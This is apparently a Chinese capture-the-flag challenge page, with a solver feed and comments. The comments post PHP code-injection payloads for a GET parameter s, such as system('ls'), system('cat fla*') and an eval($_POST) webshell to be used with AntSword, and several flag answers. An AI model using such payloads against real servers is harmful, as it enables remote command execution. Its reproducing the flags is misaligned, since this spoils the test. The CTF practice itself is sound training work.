评分(8)
解题动态

testda 攻破了该题 1小时前

Cyyyyg 攻破了该题 3小时前

goeasy 攻破了该题 5小时前

867736371 攻破了该题 6小时前

废柴小白 攻破了该题 6小时前

19893123836 攻破了该题 6小时前

baza 攻破了该题 17小时前

qwerfsafafa 攻破了该题 23小时前

Hehe0619 攻破了该题 1天前

ahco 攻破了该题 1天前

17335918325 攻破了该题 1天前

17365797718 攻破了该题 2天前

afanda 攻破了该题 2天前

zhouzehui57 攻破了该题 2天前

小白ctf 攻破了该题 3天前

rufeii 攻破了该题 3天前

qwerasdz 攻破了该题 3天前

awuawu 攻破了该题 3天前

dwx1583 攻破了该题 4天前

评论
zfly 4月前
举报
?s=system('ls') ?s=system('cat fla*')
八一卜kod 4月前
举报
cat
freestyle 7月前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
000ooo 7月前
举报
?s=eval+($_POST['123'])
ruien 7月前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 7月前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 8月前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 8月前
举报
?s=eval($_POST["cmd"]),再用蚁剑连
星空 8月前
举报
?s=eval($_POST["cmd"])
15824777912 8月前
举报
flag{11393cf7e26fe81d89dc60b63d3a1f52}